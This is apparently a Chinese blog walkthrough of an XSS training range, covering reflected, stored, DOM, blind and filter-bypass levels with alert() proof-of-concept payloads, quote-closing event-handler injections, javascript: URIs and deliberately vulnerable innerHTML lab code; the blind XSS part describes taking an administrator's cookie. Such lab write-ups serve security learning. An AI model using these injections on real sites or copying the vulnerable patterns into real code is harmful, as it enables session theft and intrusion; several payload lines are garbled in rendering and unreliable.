XSS靶场的四种类型

最新推荐文章于 2024-05-09 14:46:30 发布
最新推荐文章于 2024-05-09 14:46:30 发布
阅读量491 收藏
点赞数
文章标签: xss javascript 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52973916/article/details/127255760
版权

1.反射型XSS(get)

直接

输入,input框长度不够可以在查看器里面修改

2.反射型XSS(post)

你可以先注册一个用户,然后在用户方的input框输入xss注入内容

3.存储型XSS

针对于类似与留言板,评论区类的,可以使用存储型的xss进行注入

在 textarea 区域直接输入

4.DOM型XSS

DOM(文件对象模型):将脚本写进html文档内部,我自己的理解就是说我在输入框输入的内容不会返回给服务器,而是直接在前端js处理,直接用HTML.inner更改内容用的;

<script>
function domxss(){
	var str = document.getElementById("text").value;
	document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?		</a>";}
	//试试:'><img src="#" οnmοuseοver="alert('xss')">
	//试试:' οnclick="alert('xss')">,闭合掉就行
</script>

看下页面源代码就是说我们可以改‘str’处的值,eg:

javascript:alert(“hack”)

’ οnclick=“alert(‘xss’)”>

'>

说白了就是将他闭合,然后触发alert()事件

5.DOM型XSS-X

源代码:

                <script>
                    function domxss(){
                        var str = window.location.search;
                        var txss = decodeURIComponent(str.split("text=")[1]);
                        var xss = txss.replace(/\+/g,' ');
//                        alert(xss);

                        document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
                    }
                    //试试:'><img src="#" οnmοuseοver="alert('xss')">
                    //试试:' οnclick="alert('xss')">,闭合掉就行
                </script>
		<a href='#' onclick='domxss()'>有些费尽心机想要忘记的事情,后来真的就忘掉了</a>

这道题的关键在于domxss()方法里面的innerHTML这段话,就是对xss进行注入,跟上一题一样;eg:

​ '>

​ ’ οnclick=“alert(‘xss’)”>

​ javascript:alert(1)

6.XSS之盲打

在我看来这个一般用于客服反馈,就是说你在提交反馈信息时注入一个alert()到后台管理服务器中去,当后台管理员去打开反馈界面时我们注入的alert()就会弹出,然后一旦管理员点击了alert(),我们就可以获取管理员的Cookie信息,然后就可以进一步获取相应权限

eg:

<div class="main-content" xmlns="http://www.w3.org/1999/html">
    <div class="main-content-inner">
        <div class="breadcrumbs ace-save-state" id="breadcrumbs">
            <ul class="breadcrumb">
                <li>
                    <i class="ace-icon fa fa-home home-icon"></i>
                    <a href="../xss.php">xss</a>
                </li>
                <li class="active">xss盲打</li>

            </ul><!-- /.breadcrumb -->
            <a href="#" style="float:right" data-container="body" data-toggle="popover" data-placement="bottom" title="tips(再点一下关闭)"
               data-content="登录后台,看会发生啥?后台登录地址是/xssblind/admin_login.php">
                点一下提示~
            </a>

        </div>
        <div class="page-content">
            <div id="xss_blind">
                <p class="blindxss_tip">请在下面输入你对"锅盖头"这种发型的看法:</p>
                <p class="blindxss_tip">我们将会随机抽出一名送出麻港一日游</p>
                <form method="post">
                    <textarea class="content" name="content"></textarea><br />
                    <label>你的大名:</label><br />
                    <input class="name" type="text" name="name"/><br />
                    <input type="submit" name="submit" value="提交" />
                </form>
                            </div>
        </div><!-- /.page-content -->
    </div>
</div><!-- /.main-content -->

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cEWlKT6E-1665425026912)(C:\Users\Mark\AppData\Roaming\Typora\typora-user-images\image-20220507010242106.png)]

在文本框里输入 进行注入

7.XSS之过滤

直接用大小写替换,毕竟html兼容性比较强,可以用大小写转换来绕过过滤

eg:

8.xss之htmlspecialchars

htmlspecialchars()这个方法主要是应对html特殊字符的,但不对‘单引号做处理,所以你就明白了吧,嘿嘿嘿。

所以我们主要对中的text修改,进行提前闭合函数等方法完成alert()

        <div class="page-content">

            <div id="xssr_main">
                <p class="xssr_title">人生之所有苦短,是因为你的xss学习的还不够好</p>
                <form method="get">
                    <input class="xssr_in" type="text" name="message" />

                    <input class="xssr_submit" type="submit" name="submit" value="submit" />
                </form>
                <p class='notice'>你的输入已经被记录:</p><a href='οnclick=’alert(1)‘'>οnclick=’alert(1)‘</a>            </div>

        </div><!-- /.page-content -->

9.xss之href输出

javascript:alert(hack)

在这里插入图片描述

这道题没看源代码我做不出来,看着源代码就知道我们要改的时message值,所以在 < a href=‘…’ javascript:alert(“hack”)>

10.xss之js输出

先分析:

<script>
    $ms='asd';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }
    }
</script>

有这个我们就可以看出来,我们输入input的文本框中的值反馈到了$ms变量,所以通过修改ms值来alert()一个弹框。

我写的是复杂了点

'

你可以放进去看看,就知道了,看这个图

<script> $ms=''</script>
<script>alert("hack")</script>
<script>$a='';
if($ms.length != 0){
    if($ms == 'tmac'){
        $('#fromjs').text('tmac确实厉害,看那小眼神..')
    }else {
        //            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }
    }
</script>
学为以—
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB常见漏洞之XSS(靶场篇)
One-Fox安全团队的博客
06-30 1908
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
关于XSS靶场详解
sGanYu
08-11 1万+
xss测试链接 Level1 右击查看页面源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() //这里是显示一条指定消息和一个确认按钮的警告框 { confir..
网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)_dvwa xss注入
最新发布
2401_84264662的博客
05-09 264
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。在这之前我们已经按了F12,查看了源代码,其实除了存储型,DOM和反射都没什么意思,因为可以F12直接查看,对其他用户也没什么攻击性。,这似乎提醒着我们可以在锚点后注入(《CTF特训营 P28页也提到了锚点》),这样就不会传到服务器了。Name有长度限制,Message注入失败,应该是Name可以注入,但是被限制了。----------------写完后面的反射型,我又回来了---------------我也不知道怎么干了。
xss-labs靶场实战全通关详细过程(xss靶场详解)
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
XSS靶场通关详解(1-18关)
cz020907020808的博客
06-07 2140
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-lab靶场资源包
07-27
主要分为三种类型:反射型XSS、存储型XSS和DOM型XSS。 1. 反射型XSS:又称非持久性XSS攻击者通常通过构造带有恶意脚本的URL发送给受害者,当受害者点击链接时,浏览器会执行这些脚本。这种类型XSS通常出现在...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
XSS分为反射型XSS、存储型XSS和DOM型XSS三种主要类型: 1. **反射型XSS**:攻击者构造一个包含恶意脚本的URL,当受害者点击这个链接时,脚本会在页面中执行。 2. **存储型XSS**:恶意脚本被存储在服务器端,当其他...
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master`是一个深入理解和实践XSS注入的绝佳平台,它涵盖了多种XSS类型攻击方式,通过实战提升安全测试人员的技能。在解决每个挑战的过程中,参与者不仅可以掌握如何识别和利用XSS漏洞,还能学习如何有效...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 3万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 4647
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS靶场(史上最详细附带payload)
qq_34598847的博客
10-17 2636
Cookie 和 Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)
m0_64378913的博客
05-13 2461
1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主。 DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别的破解难度。 BlueLotus_XSSReceiver:该源码是由清华大学蓝莲花战队的firesun编写,安装方便,功能强大。 2 DVWA靶场搭建过程 方法一:可以参考《Docker上搭建DVWA漏洞环境》。安装简单,但安装结果功能有所欠缺。 方法二:可以参考《WAMP环境+DVWA漏洞测试平台搭建过程》。
xss靶场xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2273
靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
XSS靶场通关
ANYOUZHEN的博客
05-20 1764
leve1 反射型xss,将name后面的值test改为 <script>alert('xss')</script> level2 查看后端代码 得先将前面闭合 ,并且用//将后面的代码注释掉 左边的">去闭合原先的",右边的//去注释原先的"> "><script>alert('xss')</script>// level3 输入test进行尝试,发现没有成功,观察后端代码 猜测服务器端在这两处都用
Web渗透测试之XSS攻击:反射型XSS
vodkaDL的博客
12-20 2987
文章目录前言反射型XSS最简单的反射型XSS利用反射型XSS获得cookie获得cookie的最简单的方法DNSlog辅助获得cookie总结 前言 在上一篇博客中我们基本了解了XSS类型和危害,在本篇中我们将通过具体的例子和讲解,深入理解反射型XSS攻击的具体过程及危害。 反射型XSS 在上一篇中我们了解到反射型XSS是立即被包含在当前响应的HTTP请求中的,并且具有一次性,接下来我们就来看看一个最简单的反射型XSS例子。 最简单的反射型XSS 靶场题目首页如下: 接着在搜索栏输入一个最简单反射型XS
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1398
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
DVWA靶场中的XSS攻击详解与防范
在网络安全领域,XSS(跨站脚本攻击)是一种常见的漏洞类型,主要针对Web应用程序。DVWA(Damn Vulnerable Web Application)是一个专门为安全专业人员和开发人员设计的靶场,用于学习和测试各种安全漏洞,包括XSS。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值